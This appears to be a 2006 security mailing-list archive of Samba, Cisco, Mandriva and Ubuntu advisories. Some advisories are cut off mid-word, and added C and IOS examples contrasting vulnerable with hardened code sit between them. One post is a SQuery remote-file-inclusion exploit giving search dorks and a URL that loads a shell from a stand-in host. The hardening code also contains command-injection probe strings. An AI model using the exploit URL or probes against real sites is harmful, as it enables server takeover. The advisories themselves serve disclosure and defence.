circumstances an attacker could continually increase the memory usage
of the smbd process by issuing a large number of share connection
requests. By draining all available memory, this could be exploited to
render the remote Samba server unusable.


Updated packages for Ubuntu 5.04:


Re: [ANNOUNCEMENT] Samba 3.0.1 - 3.0.22: memory exhaustion DoS against smbd

2006-07-12 Thread Gerald (Jerry) Carter

Gerald (Jerry) Carter wrote:
> ==
> ==
> == Subject: Memory exhaustion DoS against smbd
> == CVE ID#: CAN-2006-1059
  ^^
> ==
> == Versions:Samba Samba 3.0.1 - 3.0.22 (inclusive)
> ==
> == Summary: smbd may allow internal structures
> ==  maintaining state for share connections
> ==  to grow unbounded.
> ==
> ==

This is a cut-n-paste error.  The correct CVE # is
CVE-2006-3403.  Sorry for any confusion. It has been
updated on the web site as well.  All other information
is correct.






cheers, jerry
=
Samba--- http://www.samba.org
Centeris ---  http://www.centeris.com
"What man is a man who does not make the world better?"  --Balian


SQuery <= 4.5(libpath) Remote File Inclusion Exploit

2006-07-12 Thread SHiKaA-
=================================================================
= SQuery <= 4.5 (libpath) Remote File Inclusion Exploit         |
=================================================================
= Worked On      : ALL VERSIONS                                 |
= Critical Level : Dangerous                                    |
= Bug Found In   : gore.php                                     |
=================================================================
= Dork : "SQuery 4.5" | "SQuery 4.0" | "SQuery 3.9" |           |
=        inurl:"modules.php?name=SQuery"                        |
=================================================================
= http://sitename.com/SQuery/lib/gore.php?libpath=http://SHELLURL.COM?
=================================================================
= Discovered By : SHiKaA
= Contact       : SHiKaA-[at]hotmail.com

GreetZ : BlAcK_BiRd  Kambaa  NANA  METO7575  Gendiaaa  Saw  SnIpEr_Sa  Masry  OSA  FEGLA  3amer


Re: ATutor 1.5.3 Cross Site Scripting

2006-07-12 Thread info
The XSS issues have been patched and will be available in the coming
maintenance release (1.5.3_pl1).


The mentioned SQL injection vulnerability is not possible. Please remove it.


[ MDKA-2006:119 ] - Updated ppp packages fix plugin vulnerability

2006-07-12 Thread security


 ___
 
 Mandriva Linux Security Advisory  MDKA-2006:119
 http://www.mandriva.com/security/
 ___
 
 Package : ppp
 Date: July 10, 2006
 Affected: 2006.0
 ___
 
 Problem Description:
 
 Marcus Meissner discovered that pppd's winbind plugin did not check the
 result of the setuid() call, which could allow an attacker to exploit
 this on systems with certain PAM limits enabled to execute the NTLM
 authentication helper as root.  This could possibly lead to privilege
 escalation dependent upon the local winbind configuration.
 
 Updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2194
 ___
 
 Updated Packages:
 
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFEswtAmqjQ0CJFipgRAjifAKDKvH8Gv/mS+pooTMJbQb7KN3Di7wCg9pmY
F1TbQTxk905x7K8bqg0ddi0=
=y43d
-END PGP SIGNATURE-
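
The unchecked setuid() pattern the advisory describes, shown beside a checked
version, as an added C example; this is illustrative code, not pppd's winbind
plugin or Mandriva's patch. The helper path, uid and gid are placeholders. The
failure it guards against is the one named above: setuid() returning -1 (on
Linux, EAGAIN when the target uid is already at the RLIMIT_NPROC limit that
pam_limits "nproc" imposes) while the calling process silently keeps root.

```c
#define _DEFAULT_SOURCE 1
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Vulnerable pattern (illustrative, not pppd's code). setuid() can fail:
 * on Linux it returns -1/EAGAIN when the target uid is already at its
 * RLIMIT_NPROC process limit, which pam_limits "nproc" sets. Because the
 * return value is ignored, execl() runs the helper with the caller's
 * identity, which for a pppd plugin is root. */
void run_helper_unchecked(uid_t uid, const char *helper)
{
    setuid(uid);                          /* BUG: result never checked */
    execl(helper, helper, (char *)NULL);  /* may now execute as root   */
    _exit(127);
}

/* Hardened drop: supplementary groups, then gid, then uid, each checked,
 * then the credentials are re-read so a refused change cannot go unnoticed.
 * Returns 0 on success, -1 with errno set on failure. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && setgroups(0, NULL) != 0)
        return -1;
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;
    if (getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

/* Hardened launcher: never exec the helper if the drop did not happen. */
void run_helper_checked(uid_t uid, gid_t gid, const char *helper)
{
    if (drop_privileges(uid, gid) != 0) {
        fprintf(stderr, "not running %s: privilege drop failed: %s\n",
                helper, strerror(errno));
        _exit(127);
    }
    execl(helper, helper, (char *)NULL);
    _exit(127);
}

int main(void)
{
    /* Dropping to the identity we already hold always succeeds. */
    printf("drop to self: %s\n",
           drop_privileges(getuid(), getgid()) == 0 ? "ok" : strerror(errno));
    /* An unprivileged process cannot take uid 0; the checked path reports
     * the refusal instead of carrying on as before. */
    if (getuid() != 0)
        printf("drop to root: %s\n",
               drop_privileges(0, 0) == 0 ? "ok" : strerror(errno));
    return 0;
}
```

Reproducing the real failure needs root: lower RLIMIT_NPROC for the target uid
(pam_limits "nproc" or setrlimit) until that uid's process count is at the
limit, then call the unchecked path; the setuid() fails and the helper runs as
root, exactly the condition the advisory describes.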



Cisco Security Advisory: Cisco Router Web Setup Ships with Insecure Default IOS Configuration

2006-07-12 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Cisco Security Advisory: 
Cisco Router Web Setup Ships with Insecure Default IOS Configuration

Document ID: 70650

Advisory ID: cisco-sa-20060712-crws

http://www.cisco.com/warp/public/707/cisco-sa-20060712-crws.shtml

Revision 1.0

For Public Release 2006 July 12 1600 UTC (GMT)

- ---

Contents


Summary
Affected Products
Details
Impact
Software Version and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

- ---

Summary
===

The default Cisco IOS configuration shipped with the Cisco Router Web
Setup (CRWS) application allows the execution of commands at privilege
level 15 through the Cisco IOS HTTP (Hypertext Transfer Protocol)
server web interface without requiring authentication credentials.
Privilege level 15 is the highest privilege level on Cisco IOS
devices.

Fixed versions of the CRWS application have been modified by Cisco to
provide a more secure default IOS configuration and additional
functionality with regards to the Cisco IOS HTTP server web interface.

This issue does not require a Cisco IOS software upgrade or a CRWS
software upgrade. Customers who decide to upgrade to a fixed version of
CRWS and deploy the new default IOS configuration will not need to
deploy the suggested workarounds. Customers who elect NOT to upgrade to
a fixed CRWS version, or customers upgrading to a fixed CRWS version
who keep their existing configuration should implement the workarounds
identified in this advisory.

Additional information on the new default IOS configuration shipped
with the CRWS application is available in the Details section of this
advisory.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20060712-crws.shtml.

Affected Products
=

Vulnerable Products
+--

The following Cisco routers whose configurations have been based on the
default IOS configuration shipped with any version of CRWS prior to
version 3.3.0 build 31 may be affected by this vulnerability:

  * Cisco 806
  * Cisco 826
  * Cisco 827
  * Cisco 827H
  * Cisco 827-4v
  * Cisco 828
  * Cisco 831
  * Cisco 836
  * Cisco 837
  * Cisco SOHO 71
  * Cisco SOHO 76
  * Cisco SOHO 77
  * Cisco SOHO 77H
  * Cisco SOHO 78
  * Cisco SOHO 91
  * Cisco SOHO 96
  * Cisco SOHO 97

Products Confirmed Not Vulnerable
+

Any of the previously listed Cisco routers whose IOS configuration is
not based on the default IOS configuration shipped with the CRWS
application are not vulnerable.

No other Cisco products are currently known to be affected by this
vulnerability.

Details
===

The Cisco Router Web Setup tool (CRWS) provides a graphical user
interface (GUI) for configuring Cisco SOHO and Cisco 800 series
routers, and allows users to set up their routers quickly and easily.
The GUI is accessed through the Cisco IOS HTTP server, which is enabled
on the default IOS configuration shipped with the CRWS application.

The Cisco IOS HTTP server uses the "enable password" (assuming one has
been configured) as its default authentication mechanism. Other
authentication mechanisms can be configured, including the use of a
local user database, an external RADIUS (Remote Authentication Dial In
User Service) or an external TACACS+ (Terminal Access Controller Access
Control System) server. The default IOS configuration shipped with the
CRWS application does not include an "enable password" or an "enable
secret" command, allowing access to the Cisco IOS HTTP server interface
at any privilege level, up to and including privilege level 15, without
providing authentication credentials. Privilege level 15 is the highest
privilege level on Cisco IOS devices.

To resolve this vulnerability, Cisco has made changes to the default
IOS configuration shipped with the CRWS application and to the CRWS
application itself. Those changes are as follows:

  * The addition of a default username and password combination to be
used during initial device configuration.

Note:  CRWS will prompt the user to change those default
credentials during its first invocation. It is strongly recommended
for customers to remove those default credentials from the device
configuration by using the Cisco IOS CLI (command line interface)
if not planning to use the CRWS application for device
configuration.

  * The addition of an authentication mechanism for the Cisco IOS HTTP
server to authenticate users based on the local user database.

  * The addition of an access restriction to only allow connections to
the Cisco IOS HTTP server from the internal network, using the
addressi
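
The weak default and the corrected configuration the advisory outlines, as an
added IOS configuration fragment; this is not Cisco's shipped CRWS
configuration, and the username, secrets and the 10.10.10.0/24 LAN are
placeholders chosen for illustration. The commands themselves (enable secret,
username ... secret, ip http authentication local, ip http access-class) are
standard IOS CLI.

```text
! Weak default described above: HTTP server enabled, no enable secret, no
! HTTP authentication method, no source restriction. With no enable password
! to check, the IOS HTTP server grants level-15 access without credentials.
ip http server
!
! Hardened configuration (placeholders in angle brackets are assumptions).
! If CRWS or web management is not needed at all, "no ip http server" is the
! simplest fix and removes the exposure entirely.
enable secret <strong-enable-secret>
username admin privilege 15 secret <strong-password>
ip http authentication local
access-list 23 remark management from the internal LAN only (placeholder range)
access-list 23 permit 10.10.10.0 0.0.0.255
access-list 23 deny   any log
ip http access-class 23
!
! Verify:  show running-config | include ip http
!          show running-config | include access-list 23
```

The three hardened lines map one-to-one onto the changes listed above: a
local user with a secret, `ip http authentication local` so the HTTP server
checks that local database rather than a missing enable password, and
`ip http access-class 23` so only the internal network can reach it at all.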

Cisco Security Advisory: Multiple Cisco Unified CallManager Vulnerabilities

2006-07-12 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Cisco Security Advisory: Multiple Cisco Unified CallManager
Vulnerabilities

Advisory ID: cisco-sa-20060712-cucm

http://www.cisco.com/warp/public/707/cisco-sa-20060712-cucm.shtml

Revision 1.0

For Public Release 2006 July 12 1600 UTC (GMT)

- -

Contents


Summary
Affected Products
Details
Impact
Software Version and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

- -

Summary
===

Cisco Unified CallManager (CUCM) 5.0 has Command Line Interface (CLI)
and Session Initiation Protocol (SIP) related vulnerabilities. There
are potential privilege escalation vulnerabilities in the CLI which
may allow an authenticated administrator to access the base operating
system with root privileges. There is also a buffer overflow
vulnerability in the processing of hostnames contained in a SIP
request which may result in arbitrary code execution or cause a
denial of service. These vulnerabilities only affect Cisco Unified
CallManager 5.0.

Cisco has made free software available to address these
vulnerabilities for affected customers. There are no workarounds
available to mitigate the effects of these vulnerabilities.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20060712-cucm.shtml

Affected Products
=

Vulnerable Products
+--

Only Cisco Unified CallManager versions 5.0(1), 5.0(2), 5.0(3) and
5.0(3a) are affected.

The version of CallManager software running can be determined by
navigating to Show > Software in the CUCM IPT Platform administration
interface or by running the command show version active in the CLI.

Products Confirmed Not Vulnerable
+

No other Cisco products are currently known to be affected by these
vulnerabilities, including all previous versions of Cisco Unified
CallManager.

Details
===

Cisco Unified CallManager is the software-based call-processing
component of the Cisco IP telephony solution which extends enterprise
telephony features and functions to packet telephony network devices
such as IP phones, media processing devices, voice-over-IP (VoIP)
gateways, and multimedia applications.

The CallManager CLI provides a backup management interface to the
system in order to diagnose and troubleshoot the primary HTTPS-based
management interfaces. The CLI, which runs as the root user, contains
two vulnerabilities in the parsing of commands. The first
vulnerability may allow an authenticated CUCM administrator to
execute arbitrary operating system programs as the root user. The
second vulnerability may allow output redirection of a command to a
file or a folder specified on the command line.

Cisco Unified CallManager supports the coexistence of both SCCP and
SIP phones, allowing for migration to SIP while protecting
investments in existing devices. CUCM contains a buffer overflow
vulnerability in the processing of excessively long hostnames which
may be included in a SIP request.

These issues are documented by the following Cisco bug IDs:

  * CSCse11005 (registered customers only) Certain CLI commands
allow execution of arbitrary Linux commands
  * CSCse31704 (registered customers only) User able to redirect
command output to a file folder
  * CSCsd96542 (registered customers only) SD-GA: CCM cores when SIP
request line host name has ASCII overflow

Impact
==

Successful exploitation of the CLI vulnerability documented in Cisco
bug ID CSCse11005 may allow authenticated CLI users to execute
arbitrary operating system commands with root privileges.
Exploitation of the CLI vulnerability documented in Cisco bug ID
CSCse31704 may allow an authenticated CLI user to modify or overwrite
any file on the filesystem as the root user.

Exploitation of the SIP vulnerability documented in Cisco bug ID
CSCsd96542 may result in arbitrary code execution or a denial of
service.

Software Version and Fixes
==

When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center ("TAC") or your contracted
maintenance provider for assistance.

Workarounds
===

There are no workarounds for these vulnerabilities.

Obtaining Fixed Software


Cisco will make free software available to
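
The two CLI weaknesses the advisory describes, arbitrary command execution and
output redirection to an attacker-chosen file, both come from letting user text
reach a shell with root privileges. As an added C example, not Cisco's CUCM
code, here is that pattern beside a hardened dispatcher: exact verb allow-list,
hostname-style argument policy, and execv() with a fixed argv so no shell ever
parses the input. The /opt/cli/... paths are placeholders.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern: user text is spliced into a shell command line and
 * handed to system(). "status; id" runs id, and "status > /etc/passwd"
 * overwrites a file, both with the wrapper's (root) privileges.
 * /opt/cli/show is a placeholder path. */
int run_cli_unchecked(const char *user_text)
{
    char cmd[512];
    snprintf(cmd, sizeof cmd, "/opt/cli/show %s", user_text);
    return system(cmd);                              /* BUG */
}

/* Allow-list: exact verb -> fixed executable (paths are placeholders). */
static const struct { const char *verb; const char *path; } commands[] = {
    { "show status",  "/opt/cli/show-status"  },
    { "show version", "/opt/cli/show-version" },
};

const char *resolve_verb(const char *verb)
{
    for (size_t i = 0; i < sizeof commands / sizeof commands[0]; i++)
        if (strcmp(verb, commands[i].verb) == 0)
            return commands[i].path;
    return NULL;
}

/* Argument policy: hostname-style tokens only. Returns 1 if acceptable.
 * Space, '/', ';', '|', '&', '>', '<', '`', '$' and everything else outside
 * [A-Za-z0-9._-] is rejected, so neither command chaining nor redirection
 * can be expressed at all. */
int arg_is_safe(const char *arg)
{
    size_t n = strlen(arg);
    if (n == 0 || n > 64)
        return 0;
    for (size_t i = 0; i < n; i++) {
        char c = arg[i];
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '-' || c == '.' || c == '_'))
            return 0;
    }
    return 1;
}

/* Hardened dispatcher: exact verb match, validated argument, execv() with a
 * fixed argv and no shell, so any leftover metacharacter is data, not syntax.
 * Returns -1 if the request is rejected, otherwise the child's exit status. */
int run_cli_checked(const char *verb, const char *arg)
{
    const char *path = resolve_verb(verb);
    if (path == NULL)
        return -1;
    if (arg != NULL && !arg_is_safe(arg))
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *argv[3] = { (char *)path, (char *)arg, NULL };
        execv(path, argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    const char *probes[] = { "pbx01.example.com", "pbx01; id", "x > /etc/passwd" };
    for (size_t i = 0; i < 3; i++)
        printf("%-20s -> %s\n", probes[i],
               arg_is_safe(probes[i]) ? "accepted" : "rejected");
    printf("verb 'show status; id' -> %s\n",
           resolve_verb("show status; id") ? "known" : "rejected");
    return 0;
}
```

The allow-list matters as much as the character filter: even a clean argument
is useless to an attacker if the only executables reachable are the fixed
paths in the table, and redirection never happens because nothing interprets
'>' as an operator.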

[USN-315-1] libmms, xine-lib vulnerabilities

2006-07-12 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-315-1  July 12, 2006
libmms, xine-lib vulnerabilities
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  libxine1 1.0-1ubuntu3.8

Ubuntu 5.10:
  libmms0  0.1-0ubuntu1.2
  libxine1c2   1.0.1-1ubuntu10.4

Ubuntu 6.06 LTS:
  libxine-main11.1.1+ubuntu2-7.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Matthias Hopf discovered several buffer overflows in libmms. By
tricking a user into opening a specially crafted remote multimedia
stream with an application using libmms, a remote attacker could
exploit this to execute arbitrary code with the user's privileges.

The Xine library contains an embedded copy of libmms, and thus needs
the same security update.


Updated packages for Ubuntu 5.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0-1ubuntu3.8.diff.gz
  Size/MD5: 5811 6a41fae784ef1516888d20a8ec08c663

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0-1ubuntu3.8.dsc
  Size/MD5: 1070 9880832522e9ec56d035abe93b4e2471

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.orig.tar.gz
  Size/MD5:  7384258 96e5195c366064e7778af44c3e71f43a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0-1ubuntu3.8_amd64.deb
  Size/MD5:   106922 2b8375b1f380d86fcf366a18d1f3b902

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.0-1ubuntu3.8_amd64.deb
  Size/MD5:  3567630 d752e90e7d26650aea95d367dcf84790

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0-1ubuntu3.8_i386.deb
  Size/MD5:   106932 d95e46c206ca84e80a98e01ad404ef71

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.0-1ubuntu3.8_i386.deb
  Size/MD5:  3750548 743fae494abdd778263762de0100a7c9

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0-1ubuntu3.8_powerpc.deb
  Size/MD5:   106944 2719a6a92c6e4cbbbd884ecdbfe7122e

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.0-1ubuntu3.8_powerpc.deb
  Size/MD5:  3925764 979cd9f6ba73ae35cdce5a965f3068a9

Updated packages for Ubuntu 5.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms_0.1-0ubuntu1.2.diff.gz
  Size/MD5: 5750 26bc4a3aa10f4c803fa97f9544ecd0bc

http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms_0.1-0ubuntu1.2.dsc
  Size/MD5:  607 592210915bc702a6d9e94ecfe0711fa7

http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms_0.1.orig.tar.gz
  Size/MD5:   317089 ebd88537af9875265e41ee65603ecd1a

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1-1ubuntu10.4.diff.gz
  Size/MD5:10600 1e73a41d99fb1fb4b2eddb43895caeac

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1-1ubuntu10.4.dsc
  Size/MD5: 1189 9f04d287f5ba301eaf6fd2f9e066e3ae

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1.orig.tar.gz
  Size/MD5:  7774954 9be804b337c6c3a2e202c5a7237cb0f8

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms-dev_0.1-0ubuntu1.2_amd64.deb
  Size/MD5:19984 21d4c0a07f60aeb1550f198722d9ec99

http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms0_0.1-0ubuntu1.2_amd64.deb
  Size/MD5:16360 bf82acc8e708dbf4605fb6be016e0e40

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.4_amd64.deb
  Size/MD5:   108948 92beceb19f7806a47992ca8d6fcb5c9c

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.4_amd64.deb
  Size/MD5:  3611402 24bcea7ae2e5a4b5776213fd551851f8

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms-dev_0.1-0ubuntu1.2_i386.deb
  Size/MD5:18312 bbe36a4ac6b616c24be2c7417a44bf26

http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms0_0.1-0ubuntu1.2_i386.deb
  Size/MD5:15116 0ed843f14b406370a7a2426ba5c8f459

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.4_i386.deb
  Size/MD5:   108956 2c9357c05d883747cb7c1c8218e7a257

http://security.ubuntu.com/ubuntu/pool/main/x/xine

[USN-316-1] installer vulnerability

2006-07-12 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-316-1  July 12, 2006
Installer vulnerability
https://launchpad.net/bugs/48350
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  passwd   1:4.0.13-7ubuntu3.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Iwan Pieterse discovered that, if you select "Go Back" at the final
message displayed by the alternate or server CD installer ("Installation
complete") and then continue with the installation from the installer's
main menu, the root password is left blank rather than locked. This was
due to an error while clearing out the root password from the
installer's memory to avoid possible information leaks.

Installations from the alternate or server CDs when the user selected
"Continue" when the "Installation complete" message was first displayed
are not affected by this bug. Installations from the desktop CD are not
affected by this bug at all.

When you upgrade your passwd package to the newest version, it will
detect this condition and lock the root password if it was previously
blank. The next point release of Ubuntu 6.06 LTS will include a
corrected installer.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.13-7ubuntu3.2.diff.gz
  Size/MD5:   204800 1b29e1615364944d98ea95498d6058b8

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.13-7ubuntu3.2.dsc
  Size/MD5:  885 8ccf50d026fa2c4cffe85330f0d0985a

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.13.orig.tar.gz
  Size/MD5:  1622557 034fab52e187e63cb52f153bb7f304c8

http://security.ubuntu.com/ubuntu/pool/main/u/user-setup/user-setup_1.1ubuntu4.dsc
  Size/MD5:  678 544762def71fb062b6d6f5484a4d7c45

http://security.ubuntu.com/ubuntu/pool/main/u/user-setup/user-setup_1.1ubuntu4.tar.gz
  Size/MD5:98334 f8d648ce6a9a007740b0e175b92385eb

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/u/user-setup/user-setup-udeb_1.1ubuntu4_all.udeb
  Size/MD5:79418 4ec2af1d5e09f129d486c142575f4081

http://security.ubuntu.com/ubuntu/pool/main/u/user-setup/user-setup_1.1ubuntu4_all.deb
  Size/MD5:   161864 bc876d6099a323cebd2ffc94df41db06

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.2_amd64.deb
  Size/MD5:   249450 bfdba1450cbe14f6c71f5d9dee5df9b3

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.2_amd64.deb
  Size/MD5:   683510 547ad48ac45f6f11cacbd268f42b152a

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.2_i386.deb
  Size/MD5:   240938 8500a4c2ab53f11b3fb8cb7fb4e00c78

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.2_i386.deb
  Size/MD5:   616346 a29d90e0ae7c7c70cbeffcbfba6bf04e

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.2_powerpc.deb
  Size/MD5:   251380 bd408187e20f19222e2b4fefe8706552

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.2_powerpc.deb
  Size/MD5:   665158 4975fe8598b4a8adc98fabcee1b4cb8e

  sparc architecture (Sun SPARC/UltraSPARC)


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.2_sparc.deb
  Size/MD5:   239930 85dde4bfa6d09491338f70efe9d6d336

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.2_sparc.deb
  Size/MD5:   620124 b0fcdadde2568b1a8324e2500718a18b


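
The distinction the notice turns on, a blank root password field versus a
locked one, is visible in shadow(5) and is what the updated passwd package
checks for. As an added C example, not Ubuntu's passwd code, here is that
check run over constructed shadow lines: an empty second field accepts any
password, a field beginning with '!' or '*' matches none.

```c
#include <stdio.h>
#include <string.h>

enum pw_state { PW_BLANK, PW_LOCKED, PW_HASHED, PW_MALFORMED };

/* Classify the password field of one shadow(5) line "name:field:...".
 * Empty field: any password, including none, is accepted at login
 * (the state USN-316-1 describes). Field starting with '!' or '*':
 * no password can match, which is "locked", the installer's intent.
 * Anything else is treated as a real hash. */
enum pw_state classify_shadow_line(const char *line)
{
    const char *c1 = strchr(line, ':');
    if (c1 == NULL)
        return PW_MALFORMED;
    const char *c2 = strchr(c1 + 1, ':');
    if (c2 == NULL)
        return PW_MALFORMED;
    if (c2 == c1 + 1)
        return PW_BLANK;
    if (c1[1] == '!' || c1[1] == '*')
        return PW_LOCKED;
    return PW_HASHED;
}

/* True if the line's first field is exactly `user`. */
int entry_is_user(const char *line, const char *user)
{
    size_t n = strlen(user);
    return strncmp(line, user, n) == 0 && line[n] == ':';
}

/* Scan shadow-format text; return 1 if root's password field is blank,
 * 0 if it is locked or hashed, -1 if there is no root entry. */
int root_password_blank(const char *shadow_text)
{
    const char *p = shadow_text;
    while (*p != '\0') {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[512];
        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        if (entry_is_user(line, "root"))
            return classify_shadow_line(line) == PW_BLANK;
        if (nl == NULL)
            break;
        p = nl + 1;
    }
    return -1;
}

/* Constructed sample data, not taken from any real system. */
const char affected_shadow[] =
    "root::13340:0:99999:7:::\n"
    "daemon:*:13340:0:99999:7:::\n"
    "alice:$1$saltsalt$0123456789abcdefghijkl:13340:0:99999:7:::\n";
const char fixed_shadow[] =
    "root:!:13340:0:99999:7:::\n"
    "alice:$1$saltsalt$0123456789abcdefghijkl:13340:0:99999:7:::\n";

int main(void)
{
    printf("affected install: root blank = %d\n", root_password_blank(affected_shadow));
    printf("after passwd fix: root blank = %d\n", root_password_blank(fixed_shadow));
    /* On a live system the remediation is what the updated passwd package
     * performs automatically: `passwd -l root`. */
    return 0;
}
```

On an installed system the same check is `sudo passwd -S root`: "L" in the
second column means locked, "NP" means no password, which is the affected
state and is fixed with `passwd -l root`.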


[USN-313-1] OpenOffice.org vulnerabilities

2006-07-12 Thread Martin Pitt
===
Ubuntu Security Notice USN-313-1  July 11, 2006
openoffice.org-amd64, openoffice.org vulnerabilities
CVE-2006-2198, CVE-2006-2199, CVE-2006-3117
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  openoffice.org-bin1.1.3-8ubuntu2.4

Ubuntu 6.06 LTS:
  openoffice.org-base   2.0.2-2ubuntu12.1
  openoffice.org-common 2.0.2-2ubuntu12.1
  openoffice.org-core   2.0.2-2ubuntu12.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Ubuntu 5.10 is also affected by these flaws. Updated packages will be
provided shortly.

Details follow:

It was possible to embed Basic macros in documents in a way that
OpenOffice.org would not ask for confirmation about executing them. By
tricking a user into opening a malicious document, this could be
exploited to run arbitrary Basic code (including local file access and
modification) with the user's privileges. (CVE-2006-2198)

A flaw was discovered in the Java sandbox which allowed Java applets
to break out of the sandbox and execute code without restrictions.  By
tricking a user into opening a malicious document, this could be
exploited to run arbitrary code with the user's privileges. This
update disables Java applets for OpenOffice.org, since it is not
generally possible to guarantee the sandbox restrictions.
